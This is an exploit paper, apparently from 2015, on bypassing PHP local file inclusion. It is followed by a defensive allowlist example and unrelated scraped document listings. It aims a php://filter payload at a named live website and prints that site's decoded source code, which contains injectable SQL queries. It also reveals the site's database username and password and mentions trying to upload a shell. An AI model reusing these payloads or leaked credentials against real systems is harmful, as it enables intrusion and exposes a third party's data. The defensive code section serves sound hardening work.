Hello friends, this is Aaditya Purani and I will show you how to bypass PHP LFI (Local File Inclusion)


#Title: PHP LFI Bypass
#Date: 12-July-2015
#Tested on: Kali Linux / Windows 7
#Category: Papers
#Exploit Author: Aaditya Purani

Hello friends, this is Aaditya Purani and I will show you how to bypass PHP LFI (Local File Inclusion).

In this tutorial I am going to give you a URL to show you how this works and how to bypass the open_basedir restriction etc. It doesn't always work, but if you do perfect encoding then it will work.

Example of reading a file out base64-encoded:
(php://filter/convert.base64-encode/resource=index.php&top=home)

#POC:
URL (200) OK

ERROR

Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/home/jthkrgfw/:/tmp:/var/tmp:/usr/local/lib/php/) in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129
Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129
Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/home/jthkrgfw/:/tmp:/var/tmp:/usr/local/lib/php/) in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129
Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line 129
Warning: include() [function.include]: Failed opening '../../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/local/lib/php') in /home/jthkrgfw/domains/mistflard.nl/public_html/index.php on line

URL THAT TRIGGERED ERROR
========================================
Now we see what we can do here.

1.) http://mistflard.nl/index.php?page=php://filter/convert.base64-encode/resource=index.php
=========================================
2.) Base64-encoded response
Decoded Response

<?php
require "prepend.php";
$login=$_GET['login'];
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name = "viewport" content = "width=1024" />
<link href="stijl.css" rel="stylesheet" type="text/css" />
<!--[if IE 6]> <link href="stijl1.css" rel="stylesheet" type="text/css"><![endif]-->
<link rel="shortcut icon" href="/favicon.ico" />
<title>mistflard</title>
<script type="text/javascript" src="md5.js"></script>
<script language="javascript">
function passResponse() {
  var user_element = document.login.user_temp.value; // document.hform.user.value
  //document.hform.pass.value
  pass=user_element+document.login.pass_temp.value;
  document.login.pass_temp.value = "";
  wacht1=MD5(pass).toLowerCase();
  pass="";
  <?php $para=microtime(1)*1000; ?>
  buff=wacht1+<?php echo $para; ?>;
  wacht2=MD5(buff).toLowerCase();
  document.hform.user.value=user_element;
  document.hform.password.value=wacht2;
  document.hform.code.value=<?php echo $para; ?>;
  document.hform.submit();
}
</script>
</head>
<body>
<div id="main">
<div id="hoofd">
<div id="login">
<?php
if ($_SESSION['user']==null)
{
  if ($login==1) echo "<a href='index.php?page=home.php&login=0' title='ga terug'><img src='images/knopy.gif' alt='uit' style='border:0'/></a>";
  else echo "<a href='index.php?page=inleidingadmin.php&login=1' ><img src='images/knopx.gif' alt='aan' style='border:0'/></a>";
  if ($login!=1)
  {
    include "controle.php";
    echo "<table><tr>";
    echo "<td>gebruikersnaam:</td><td>wachtwoord:</td></tr>";
    echo "<tr><form action='login.php' method='post'>";
    echo "<td><input type='text' name='username' value='' style='width:87px;height:12px;font-size:11px'/></td>";
    echo "<td><input type='password' name='password' value='' style='width:87px;height:12px;font-size:11px' /></td>";
    echo "<td><input type='hidden' name='code' value=$para ></td>";
    echo "<td><input type='submit' name='submitbutton' value='login' class='knop1'/></td>";
    echo "</form> ";
  } else
  {
    echo '<form name="login">';
    echo '<table><tr><td>gebruikersnaam:</td><td>wachtwoord:</td></tr>';
    echo "<td><input type='text' name='user_temp' value='' style='width:87px;height:12px;font-size:11px' /></td>";
    echo "<td><input type='password' name='pass_temp' value='' style='width:87px;height:12px;font-size:11px' /></td>";
    echo '<td><input onclick="passResponse(); return false;" type="submit" name="submitbtn" value="login veilig" class="knop2"></td>';
    echo '</form>';
    echo '<form action="loginveilig.php" METHOD="POST" name="hform">';
    echo '<input type="hidden" name="user">';
    echo '<input type="hidden" name="password">';
    echo '<input type="hidden" name="code">';
    echo '</form>';
  }
} else
{
  echo "<img src='images/knopz.gif' alt='' style='border:0'/></a>";
  $user=$_SESSION['user'];
  echo "<table><tr><td style='width:220px'>$user is ingelogd.</td></tr>";
  echo "<tr><td><form action='loguit.php' method='post'><input type='submit' name='sub2a' value='loguit' class='knop1' title='uitloggen'/>";
  echo "</form></td>"; //(<a href="loguit.php">loguit</a>)
}
if (($_SESSION['user']==null) && ($login!=1))
{
  echo "<form action='index.php?page=php/forum/meldaan.php' method='post'>";
  echo "<td><input type='submit' name='submitbutton' value='inschrijven' class='knop2'/>";
  echo "</td></form>";
  echo "<form action='index.php?page=php/forum/vergeten.php' method='post'>";
  echo "<td><input type='submit' name='sub2' value='?' class='knop0' title='wachtwoord vergeten?'/>";
  echo "</td></form>";
} else if ($login!=1)
{
  echo "<form action='index.php?page=php/forum/schrijfuit.php' method='post'>";
  echo"<td style='width:128px'></td>";
  echo "<td><input type='submit' name='submitbutton' value='uitschrijven' class='knop2'/>";
  echo "<input type='hidden' name='usernaam' value=\"$user\">";
  echo "</td></form>";
  if ($user=='admin')
  {
    echo "<form action='index.php?page=php/forum/instellingen.php' method='post'>";
    echo "<td><input type='submit' name='substelin' value='in.' class='knop0' title='instellingen'/>";
    echo "</td></form>";
  }
}
echo "</tr></table></div>"; // end of login
$vorm1='';$vorm2='';$vorm3='';$vorm4='';$vorm5='';$vorm6='';
if (isset($_GET['page']))
  $page = $_GET['page'];
else $page = "inleiding.php";
if ($page=="inleiding.php") {$vorm1='blok';} else
if ($page=="inleidingadmin.php") {$vorm1='blok';} else
if ($page=="home.php") {$vorm2='blok';} else
if ($page=="toelichting.php") {$vorm3='blok';} else
if ($page=="forumregels.php") {$vorm4='blok';} else
if (($page=="contact.php") || ($page=="eform.php") || ($page=="mail.php") ) {$vorm5='blok';} else {$vorm2='blok'; }
?>
</div> <!-- end of Hoofd -->
<div class="menu">
<div class="hovermenu">
<ul>
<li id="<?php echo $vorm1; ?>"><a href="index.php?page=inleiding.php" title="inleiding"><span>inleiding</span></a></li>
<li id="<?php echo $vorm2; ?>"><a href="index.php?page=home.php" title="forum"><span>forum</span></a></li>
<li id="<?php echo $vorm3; ?>"><a href="index.php?page=toelichting.php" title=""><span>toelichting</span></a></li>
<li id="<?php echo $vorm4; ?>"><a href="index.php?page=forumregels.php" title=""><span>forum regels</span></a></li>
<li id="<?php echo $vorm5; ?>"><a href="index.php?page=contact.php" title=""><span>contact</span></a></li>
</ul>
</div>
</div>
<div class="balk"><!-- for IE 6 --></div>
<?php
if (isset($_GET['page']))
  $page = $_GET['page'];
else $page = "inleiding.php";
?>
<?php
echo"<div id='content'>";
if (($page=="inleidingadmin.php") && ($_SESSION['user']!=null)) $page="inleiding.php";
include $page;
echo "</div>"; /* end of content */
?>
<div id="voet">
<?php
setlocale(LC_TIME,'nl_nl','nl','du');
echo "<div style='margin-left:600px;margin-top:10px;'>".'pagina geopend: ', strftime("%H:%M:%S %A %d %B %Y", mktime()),'</div>';
?>
</div>
</div> <!-- end of main -->
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("ua ");
pageTracker._trackPageview();
} catch(err) {}
</script>
</body>
</html>

4.) Now we move on to see if we can root the box or at least get a shell uploaded. They have the open_basedir restriction in effect, so I highly doubt we can upload a shell via proc/self/environ, but we can try it.

5.) So I grab prepend.php and decode its contents as well, using Opinionated Geek's base64 decoder online, and got the following:

prepend.php

<?php
session_start();
require_once "MyDB.class.php";
require_once "php/login/versio.inc.php";

function check_ip($ip)
{
  $mydb= new MyDB();
  $sql="select * FROM blokkeer Where ip='$ip'";
  $result=$mydb->doquery($sql);
  if (mysql_num_rows($result) == 0) return true;
  else
  {
    $vandaag=date("y-m-d");
    $line = $mydb->fetch($result);
    $datum=$line[2];
    $reden=$line[4];
    setlocale(LC_TIME,'nl_nl','nl','du');
    $refa1=strpos($datum,'-');
    $refa2=strripos($datum,'-');
    $jaara=substr($datum,0,$refa1);
    $daga=substr($datum,($refa2+1),2);
    $maanda=substr($datum,($refa1+1),2);
    $dat=strftime("%a %d %B %Y", mktime(0, 0, 0, $maanda, $daga, $jaara));
    if ($datum>$vandaag)
    {
      echo "De toegang tot deze functie is u ontzegd, IP-adres geblokkeerd tot ".$dat;
      if (($reden!='') && ($reden!=null)) echo "<br>wegens: ".$reden;
      echo '<br><br>keer terug naar de begin pagina.';
      echo '<table><tr></tr><tr>';
      echo '<form action="index.php?page=home.php" method="post">';
      echo '<td><input type="submit" value="ok" class="verstuur"></td>';
      echo '</form></tr></table>';
      return false;
    }
    else return true;
  }
}

function check_mail($user)
{
  $mydb= new MyDB();
  $sql="select veri FROM WebUser Where username='$user'";
  $result=$mydb->doquery($sql);
  $line = $mydb->fetch($result);
  if ($line[0] == 1) return true; else return false;
}

function check_auth_user3($user,$authorization) // new function with extra checks
{
  $sx=false;
  $mydb= new MyDB();
  $sql = "Select sessionid,ip from WebUser where username='$user'";
  //echo $sql;
  $result=$mydb->doquery($sql);
  if (mysql_num_rows($result) >0)
  {
    $line = $mydb->fetch($result);
    $sessionid=$line[0];
    $ip=$line[1];
    $ipref=$_SERVER['REMOTE_ADDR'];
    $len=strlen($_SESSION['session_id']);
    $sw=false; // session id does not match
    if (($sessionid==$_SESSION['session_id']) && ($len==50) ) $sw=true;
    else {echo "Geen toegang: Sessionid klopt niet.<br>".$_SESSION['session_id']."<br>".$sessionid."<br>". $_SESSION['error_message']."<br>"; return false;}
    if (($sw) && ($ip==$ipref)) $sx=true;
    else {echo "Geen toegang: Inlog-IPadres verschilt van huidig IP-adres.<br>"; return false;} // username does not match
  }
  else {echo "Geen toegang: Log eerst in a.u.b.<br>"; return false;} // username does not match
  if (($user) && ($sx))
  {
    $query = "select * from UserAuthorization where username = '"."$user"."' and authorization='"."$authorization"."' ";
    $result=$mydb->doquery($query);
    if (mysql_num_rows($result) >0) return true;
    else {echo "U bent niet geautoriseerd om deze pagina te openen.<br>"; return false;} // authorization does not match
  }
  else return false; // no username
}

function check_auth_user4($user,$authorization) // new function with extra checks, same function as 3 but without the text message
{
  $sx=false;
  $mydb= new MyDB();
  $sql = "Select sessionid,ip from WebUser where username='$user'";
  //echo $sql;
  $result=$mydb->doquery($sql);
  if (mysql_num_rows($result) >0)
  {
    $line = $mydb->fetch($result);
    $sessionid=$line[0];
    $ip=$line[1];
    $ipref=$_SERVER['REMOTE_ADDR'];
    $len=strlen($_SESSION['session_id']);
    $sw=false;
    if (($sessionid==$_SESSION['session_id']) && ($len==50) ) $sw=true;
    else return false; // session id does not match
    if (($sw) && ($ip==$ipref)) $sx=true;
    else return false; // IP does not match
  }
  else return false; // username does not match
  if (($user) && ($sx))
  {
    $query = "select * from UserAuthorization where username = '"."$user"."' and authorization='"."$authorization"."' ";
    $result=$mydb->doquery($query);
    if (mysql_num_rows($result) >0) return true;
    else return false; // authorization does not match
  }
  else return false; // no username
}

function check_auth_user5($user,$session,$authorization) // function for a separate check so that a valid submit is still possible after the session has expired
{
  $sx=false;
  $mydb= new MyDB();
  $sql = "Select sessionid,ip from WebUser where username='$user'";
  //echo $sql;
  $result=$mydb->doquery($sql);
  if (mysql_num_rows($result) >0)
  {
    $line = $mydb->fetch($result);
    $sessionid=$line[0];
    $ip=$line[1];
    $ipref=$_SERVER['REMOTE_ADDR'];
    $len=strlen($session);
    $sw=false;
    if ( ($sessionid==$session) && ($len==50) ) {$sw=true; echo "Check_auth_user5 succesvol uitgevoerd<br>";}
    else return false; // session id does not match
    if (($sw) && ($ip==$ipref)) $sx=true;
    else return false; // IP does not match
  }
  else return false; // username does not match
  if (($user) && ($sx))
  {
    $query = "select * from UserAuthorization where username = '"."$user"."' and authorization='"."$authorization"."' ";
    $result=$mydb->doquery($query);
    if (mysql_num_rows($result) >0) return true;
    else return false; // authorization does not match
  }
  else return false; // no username
}
?>

That wasn't easy, but you can also extract the configuration.php / config.php file too.

====================
login info
====================
define(host, "localhost");
define(username,"jthkrgfw_beheer");
define(password,"w15129");
define(database,"jthkrgfw_mistflard");

And to top it off, they block access from outside to the MySQL server, so what are we to do?

So this is how you bypass PHP-based LFI in a case where direct query is blocked.

Thank you.
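
A hardened form of the `include $page;` line from the decoded index.php, added here as an example; it is not code from the paper or from the site. The page names are the `?page=` values visible in the decoded source; `PAGE_DIR`, `DEFAULT_PAGE`, `ALLOWED_PAGES`, `resolve_page()` and `include_page()` are hypothetical names, and the `./pages` directory layout is an assumption.

```php
<?php
declare(strict_types=1);

// Added example, not the site's code. PAGE_DIR is an assumed layout: every
// includable page lives below ./pages next to this script.
const PAGE_DIR = __DIR__ . '/pages';
const DEFAULT_PAGE = 'inleiding.php';

// Allowlist taken from the ?page= values that appear in the decoded index.php.
const ALLOWED_PAGES = [
    'inleiding.php',
    'inleidingadmin.php',
    'home.php',
    'toelichting.php',
    'forumregels.php',
    'contact.php',
    'eform.php',
    'mail.php',
    'php/forum/meldaan.php',
    'php/forum/vergeten.php',
    'php/forum/schrijfuit.php',
    'php/forum/instellingen.php',
];

/**
 * Turn the untrusted ?page= value into an allowlisted page name.
 * The request only selects an entry; it never becomes part of a path, so
 * php://filter/... and ../../etc/passwd fall back to the default page.
 *
 * @param mixed $requested raw $_GET['page'] (may be missing or an array)
 */
function resolve_page($requested): string
{
    if (!is_string($requested)) {
        return DEFAULT_PAGE;               // absent, or ?page[]=... array input
    }
    // Strict comparison: no type juggling, no partial or case-folded match.
    return in_array($requested, ALLOWED_PAGES, true) ? $requested : DEFAULT_PAGE;
}

/**
 * Include an allowlisted page after confirming that the resolved file still
 * sits under the page directory (defence in depth against a symlink or a bad
 * allowlist entry). Returns false instead of including when the check fails.
 */
function include_page(string $name, string $pageDir = PAGE_DIR): bool
{
    $base = realpath($pageDir);
    $path = realpath($pageDir . '/' . $name);
    if ($base === false || $path === false) {
        return false;                      // directory or page file missing
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return false;                      // resolved outside the page directory
    }
    include $path;
    return true;
}

// Replacement for:  $page = $_GET['page']; ... include $page;
//   include_page(resolve_page($_GET['page'] ?? null));

// Self-check with constructed inputs when run from the command line.
if (PHP_SAPI === 'cli') {
    $samples = [
        'home.php',
        'php/forum/vergeten.php',
        'php://filter/convert.base64-encode/resource=index.php',
        '../../../../../../../../etc/passwd',
        'HOME.PHP',
        ['home.php'],
        null,
    ];
    foreach ($samples as $sample) {
        printf(
            "%-58s => %s\n",
            json_encode($sample, JSON_UNESCAPED_SLASHES),
            resolve_page($sample)
        );
    }
}
```

open_basedir remains useful as a second layer, but as the warnings above show it only blocked /etc/passwd; index.php sits inside the allowed path, so the php://filter read of it was not stopped.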


More information

1. Building Testing Environment

1. Building Testing Environment The Practice of Web Application Penetration Testing 1. Building Testing Environment Intrusion of websites is illegal in many countries, so you cannot take other s web sites as your testing target. First,

More information

Adding Value to Automated Web Scans. Burp Suite and Beyond

Adding Value to Automated Web Scans. Burp Suite and Beyond Adding Value to Automated Web Scans Burp Suite and Beyond Automated Scanning vs Manual Tes;ng Manual Tes;ng Tools/Suites At MSU - QualysGuard WAS & Burp Suite Automated Scanning - iden;fy acack surface

More information

NT Authentication Configuration Guide

NT Authentication Configuration Guide NT Authentication Configuration Guide Version 11 Last Updated: March 2014 Overview of Ad Hoc Security Models Every Ad Hoc instance relies on a security model to determine the authentication process for

More information

Improving Magento Front-End Performance

Improving Magento Front-End Performance Improving Magento Front-End Performance If your Magento website consistently loads in less than two seconds, congratulations! You already have a high-performing site. But if your site is like the vast

More information

my First PHP Lab

<head> <meta content=text/html; charset=utf-8 http-equiv=content-type /> <title>my First PHP Lab</title> </head> Lab1.html my First PHP Lab Please enter your Username and Email Name:

More information

WA 2. GWT Martin Klíma

WA 2. GWT Martin Klíma WA 2 GWT Martin Klíma GWT What is it? Google Web Toolkig Compiler from Java to JavaScript + HTML Set of JavaScript and Java scripts / classes Development environment SDK Integration with IDE Eclipse, Netbeans,

More information

Welcome to CSE 330 Crea0ve Progamming and Rapid Prototyping. Course Informa0on

Welcome to CSE 330 Crea0ve Progamming and Rapid Prototyping. Course Informa0on Welcome to CSE 330 Crea0ve Progamming and Rapid Prototyping 1 Extensible - CSE 330 Creative Networking Programming Platform and Rapid Prototyping 1 Course Informa0on Instructor Todd Sproull todd@wustl.edu

More information

INSTALLING, CONFIGURING, AND DEVELOPING WITH XAMPP

INSTALLING, CONFIGURING, AND DEVELOPING WITH XAMPP INSTALLING, CONFIGURING, AND DEVELOPING WITH XAMPP by Dalibor D. Dvorski, March 2007 Skills Canada Ontario DISCLAIMER: A lot of care has been taken in the accuracy of information provided in this article,

More information

FireBLAST Email Marketing Solution v2

FireBLAST Email Marketing Solution v2 Installation Guide WELCOME to fireblast, one of the Industry s leading Email Marketing Software Solutions for your business. Whether you are creating a small email campaign, or you are looking to upgrade

More information

Analysis and web structures optimization

Analysis and web structures optimization Analysis and web structures optimization Zdenka Prokopova, Radek Silhavy, and Petr Silhavy Abstract The aim of the presented paper is to familiarize the reader with methods and techniques of web structures

More information

RIGHTNOW TECHNOLOGIES

RIGHTNOW TECHNOLOGIES RIGHTNOW TECHNOLOGIES Implementing SiteCatalyst in RightNow Technologies August 20, 2008 Version 2.0 CHAPTER 1 1 Overview RightNow Technologies is a popular customer relationship management (CRM system

More information

PHP and XML. Brian J. Stafford, Mark McIntyre and Fraser Gallop

PHP and XML. Brian J. Stafford, Mark McIntyre and Fraser Gallop What is PHP? PHP and XML Brian J. Stafford, Mark McIntyre and Fraser Gallop PHP is a server-side tool for creating dynamic web pages. PHP pages consist of both HTML and program logic. One of the advantages

More information

Content Management System

Content Management System Content Management System XT-CMS INSTALL GUIDE Requirements The cms runs on PHP so the host/server it is intended to be run on should ideally be linux based with PHP 4.3 or above. A fresh install requires

More information

HTML5 and CSS3. new semantic elements advanced form support CSS3 features other HTML5 features

HTML5 and CSS3. new semantic elements advanced form support CSS3 features other HTML5 features HTML5 and CSS3 new semantic elements advanced form support CSS3 features other HTML5 features fallback solutions HTML5 and CSS3 are new and evolving standards two levels of fallback different browsers

More information

How to Configure edgebox as a Web Server

How to Configure edgebox as a Web Server intelligence at the edge of the network www.critical-links.com edgebox V4.5 Introduction: The Web Server panel allows the simple creation of multiple web sites using the Apache web server. Each website

More information

Twinfield Single Sign On

Twinfield Single Sign On Twinfield Single Sign On manual, version 5.4 April 2009 For general information about our webservices see the Twinfield Webservices Manual Twinfield International NV De Beek 9-15 3871 MS Hoevelaken Netherlands

More information

Turning Data into Information Tools, Tips, and Training

Turning Data into Information Tools, Tips, and Training A Summer Series Sponsored by Erin Gore, Institutional Data Council Chair; Berkeley Policy Analysts Roundtable, Business Process Analysis Working Group (BPAWG) and Cal Assessment Network (CAN) Web Data

More information

Web development, as you it

Web development, as you it Web development, as you it Lukas Renggli Academics PhD Student, University of Bern Industry Independent Software Consultant Communities Core-developer of Seaside Author of Magritte and Pier Agenda Natural

More information

Livezilla How to Install on Shared Hosting http://www.jonathanmanning.com By: Jon Manning

Livezilla How to Install on Shared Hosting http://www.jonathanmanning.com By: Jon Manning Livezilla How to Install on Shared Hosting By: Jon Manning This is an easy to follow tutorial on how to install Livezilla 3.2.0.2 live chat program on a linux shared hosting server using cpanel, linux

More information

Introduction to web development and JavaScript

Introduction to web development and JavaScript Objectives Chapter 1 Introduction to web development and JavaScript Applied Load a web page from the Internet or an intranet into a web browser. View the source code for a web page in a web browser. Knowledge

More information

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh

Web applications. Web security: web basics. HTTP requests. URLs. GET request. Myrto Arapinis School of Informatics University of Edinburgh Web applications Web security: web basics Myrto Arapinis School of Informatics University of Edinburgh HTTP March 19, 2015 Client Server Database (HTML, JavaScript) (PHP) (SQL) 1 / 24 2 / 24 URLs HTTP

More information

Introduction to Web Development with Dreamweaver

Introduction to Web Development with Dreamweaver ITS Training Introduction to Web Development with Dreamweaver In this Workshop In this workshop you will be introduced to HTML basics and using Dreamweaver to create and edit web files. You will learn

More information

Setup and Administration for ISVs

Setup and Administration for ISVs 17 Setup and Administration for ISVs ISV accounts for both hosted and private cloud support white labeling functionality and give you the ability to provision and manage customer tenants directly. A customer

More information

Embedding tracking code into IAS

Embedding tracking code into IAS Embedding tracking code into IAS Author: GeoWise User Support Released: 23/11/2011 Version: 6.4.4 Embedding tracking code into IAS Table of Contents 1. Introduction... 1 2. Pre-requisites... 1 2.1. Sign

More information

Web Development in Java Live Demonstrations (Live demonstrations done using Eclipse for Java EE 4.3 and WildFly 8)

Web Development in Java Live Demonstrations (Live demonstrations done using Eclipse for Java EE 4.3 and WildFly 8) Web Development in Java Live Demonstrations (Live demonstrations done using Eclipse for Java EE 4.3 and WildFly 8) Java Servlets: 1. Switch to the Java EE Perspective (if not there already); 2. File >

More information

Differences between HTML and HTML 5

Differences between HTML and HTML 5 Differences between HTML and HTML 5 1 T.N.Sharma, 2 Priyanka Bhardwaj, 3 Manish Bhardwaj Abstract: Web technology is a standard that allow developing web applications with the help of predefined sets of

More information

Saya WebServer Mini-project report

Saya WebServer Mini-project report Saya WebServer Mini-project report Introduction: The Saya WebServer mini-project is a multipurpose one. One use of it is when a lecturer (of the cs faculty) is at the reception desk and interested in knowing

More information

Web Performance Boot Camp. Speed It Up

Web Performance Boot Camp. Speed It Up Web Performance Boot Camp / Speed It Up Who am I? @postwait on twitter Author of Scalable Internet Architectures Pearson, ISBN: 067232699X (and Web Operations by O Reilly) CEO of OmniTI We build scalable

More information

BUILDING MOBILE WEB APPS WITH PHONEGAP. Matt Zukowski

BUILDING MOBILE WEB APPS WITH PHONEGAP. Matt Zukowski BUILDING MOBILE WEB APPS WITH PHONEGAP Matt Zukowski This slide deck https://slid.es/zukzuk/phonegap 1. Install Android Development Tools 2. Install Phonegap 3. Build a simple app using Phonegap 4. Build

More information

Creating Java EE Applications and Servlets with IntelliJ IDEA

Creating Java EE Applications and Servlets with IntelliJ IDEA Creating Java EE Applications and Servlets with IntelliJ IDEA In this tutorial you will: 1. Create IntelliJ IDEA project for Java EE application 2. Create Servlet 3. Deploy the application to JBoss server

More information

Web Accessibility Checker atutor.ca/achecker. Friday October 31, 2014 06:43:15

Web Accessibility Checker atutor.ca/achecker. Friday October 31, 2014 06:43:15 Friday October 31, 2014 06:43:15 Source URL: https://abonneren.rijksoverheid.nl Source Title: Abonneren Abonneren.Rijksoverheid.nl Accessibility Review (Guidelines: WCAG 2.0 (Level AAA)) Report on known

More information

Uw partner in system management oplossingen

Uw partner in system management oplossingen Uw partner in system management oplossingen User Centric IT Bring your Own - Corporate Owned Onderzoek Forrester Welke applicatie gebruik je het meest op mobiele devices? Email 76% SMS 67% IM / Chat 48%

More information

Make a Joomla Template in 5 Easy Steps A Beginners Guide

Make a Joomla Template in 5 Easy Steps A Beginners Guide Make a Joomla Template in 5 Easy Steps A Beginners Guide By Gary Reid http://clubtvk.com Copyright 2006 Gary Reid. All Rights Reserved. No part of this book may be used or reproduced in any manner whatsoever

More information

Introduction to Web Development

Introduction to Web Development Introduction to Web Development Week 2 - HTML, CSS and PHP Dr. Paul Talaga 487 Rhodes paul.talaga@uc.edu ACM Lecture Series University of Cincinnati, OH October 16, 2012 1 / 1 HTML Syntax For Example:

More information

SmartTouch R CRM Enhancements. 1. Administrators now have an Account Preferences Section where you can view emails & phones in search views.

SmartTouch R CRM Enhancements. 1. Administrators now have an Account Preferences Section where you can view emails & phones in search views. SmartTouch R CRM Enhancements 1. Administrators now have an Account Preferences Section where you can view emails & phones in search views. You now have the option to view Email Address and/or Phone Number

More information

Create dynamic sites with PHP & MySQL

Create dynamic sites with PHP & MySQL Create dynamic sites with PHP & MySQL Presented by developerworks, your source for great tutorials Table of Contents If you're viewing this document online, you can click any of the topics below to link

More information

Oracle Eloqua HIPAA Advanced Data Security Add-on Cloud Service

Oracle Eloqua HIPAA Advanced Data Security Add-on Cloud Service http://docs.oracle.com Oracle Eloqua HIPAA Advanced Data Security Add-on Cloud Service Configuration Guide 2015 Oracle Corporation. All rights reserved 05/11/2015 Contents 1 HIPAA 3 1.0.1 What is HIPAA?

More information

Penetration Testing Report Client: Business Solutions June 15 th 2015

Penetration Testing Report Client: Business Solutions June 15 th 2015 Penetration Testing Report Client: Business Solutions June 15 th 2015 Acumen Innovations 80 S.W 8 th St Suite 2000 Miami, FL 33130 United States of America Tel: 1-888-995-7803 Email: info@acumen-innovations.com

More information

Big Data Meets Infosec Visualiza4on. Forensics Challenge 10 Honeynet.org

Big Data Meets Infosec Visualiza4on. Forensics Challenge 10 Honeynet.org Big Data Meets Infosec Visualiza4on Forensics Challenge 10 Honeynet.org Challenge Design and build a visualiza4on that describes the aaacks that were analyzed in FC5. Use the three prize winners solu4ons

More information

STABLE & SECURE BANK lab writeup. Page 1 of 21

STABLE & SECURE BANK lab writeup. Page 1 of 21 STABLE & SECURE BANK lab writeup 1 of 21 Penetrating an imaginary bank through real present-date security vulnerabilities PENTESTIT, a Russian Information Security company has launched its new, eighth

More information

TheComplete GoogleAnalytics PowerUserGuide

TheComplete GoogleAnalytics PowerUserGuide TheComplete GoogleAnalytics PowerUserGuide 1 Introduction: Google Analytics (GA) can be a powerful tool. It can also be incredibly intimidating for new users. This guide is a compilation of VKI's Google

More information

Site Store Pro. INSTALLATION GUIDE WPCartPro Wordpress Plugin Version

Site Store Pro. INSTALLATION GUIDE WPCartPro Wordpress Plugin Version Site Store Pro INSTALLATION GUIDE WPCartPro Wordpress Plugin Version WPCARTPRO INTRODUCTION 2 SYSTEM REQUIREMENTS 4 DOWNLOAD YOUR WPCARTPRO VERSION 5 EXTRACT THE FOLDERS FROM THE ZIP FILE TO A DIRECTORY

More information

HowTo. Planning table online

HowTo. Planning table online HowTo Project: Description: Planning table online Installation Version: 1.0 Date: 04.09.2008 Short description: With this document you will get information how to install the online planning table on your

More information

Internet Ohjelmointi 1 Examples 4

Internet Ohjelmointi 1 Examples 4 Internet Ohjelmointi 1 Example 1 4 form 5 6 7 8 Loan Amount 9 Monthly Repayment

More information

CPE111 COMPUTER EXPLORATION

CPE111 COMPUTER EXPLORATION CPE111 COMPUTER EXPLORATION BUILDING A WEB SERVER ASSIGNMENT You will create your own web application on your local web server in your newly installed Ubuntu Desktop on Oracle VM VirtualBox. This is a

More information

Welcome to Collage (Draft v0.1)

Welcome to Collage (Draft v0.1) Welcome to Collage (Draft v0.1) Table of Contents Welcome to Collage (Draft v0.1)... 1 Table of Contents... 1 Overview... 2 What is Collage?... 3 Getting started... 4 Searching for Images in Collage...

More information

SAMSUNG SMARTTV: HOW-TO TO CREATING INSECURE DEVICE IN TODAY S WORLD. Sergey Belov

SAMSUNG SMARTTV: HOW-TO TO CREATING INSECURE DEVICE IN TODAY S WORLD. Sergey Belov Sergey Belov # whoami Penetration tester @ Digital Security Bug hunter Speaker Agenda SmartTV - what is it? Current state of research (in the world) Samsung Smart TV - series 2008-2014 Emulator vs real

More information

Web Development using PHP (WD_PHP) Duration 1.5 months

Web Development using PHP (WD_PHP) Duration 1.5 months Duration 1.5 months Our program is a practical knowledge oriented program aimed at learning the techniques of web development using PHP, HTML, CSS & JavaScript. It has some unique features which are as

More information

HTML Redirect Integration Guide

HTML Redirect Integration Guide Business Gateway HTML Redirect Integration Guide V5.2 September 2015 Use this guide to: Integrate your website with Worldpay Create and test HTML Redirect orders Look up ISO codes, payment method codes,

More information

AD Phonebook 2.2. Installation and configuration. Dovestones Software

AD Phonebook 2.2. Installation and configuration. Dovestones Software AD Phonebook 2.2 Installation and configuration 1 Table of Contents Introduction... 3 AD Self Update... 3 Technical Support... 3 Prerequisites... 3 Installation... 3 Adding a service account and domain

More information

Download: Server-side technologies. WAMP (Windows), http://www.wampserver.com/en/ MAMP (Mac), http://www.mamp.info/en/

Download: Server-side technologies. WAMP (Windows), http://www.wampserver.com/en/ MAMP (Mac), http://www.mamp.info/en/ + 1 Server-side technologies Apache,, Download: Apache Web Server: http://httpd.apache.org/download.cgi application server: http://www.php.net/downloads.php DBMS: http://www.mysql.com/downloads/ LAMP:

More information

LIBRARY MANAGEMENT SYSTEM

LIBRARY MANAGEMENT SYSTEM Mini Project Report On LIBRARY MANAGEMENT SYSTEM Submitted By: PRABHAKAR KUMAR RAHUL KUMAR RAJAT SINGH VIKRAM PRATAP SINGH In partial fulfillment for the award of the degree of B. TECH DEGREE In COMPUTER

More information

Relationele Databases 2002/2003

Relationele Databases 2002/2003 1 Relationele Databases 2002/2003 Hoorcollege 5 22 mei 2003 Jaap Kamps & Maarten de Rijke April Juli 2003 Plan voor Vandaag Praktische dingen 3.8, 3.9, 3.10, 4.1, 4.4 en 4.5 SQL Aantekeningen 3 Meer Queries.

More information

Workshop - Day 1. symfony workshop www.symfony-project.com www.sensiolabs.com

Workshop - Day 1. symfony workshop www.symfony-project.com www.sensiolabs.com Workshop - Day 1 symfony workshop www.symfony-project.com www.sensiolabs.com Symfony Introduction symfony workshop www.symfony-project.com www.sensiolabs.com Sensio Sensio Web Agency Web agency Webmarketing

More information

Apple URL Scheme Reference

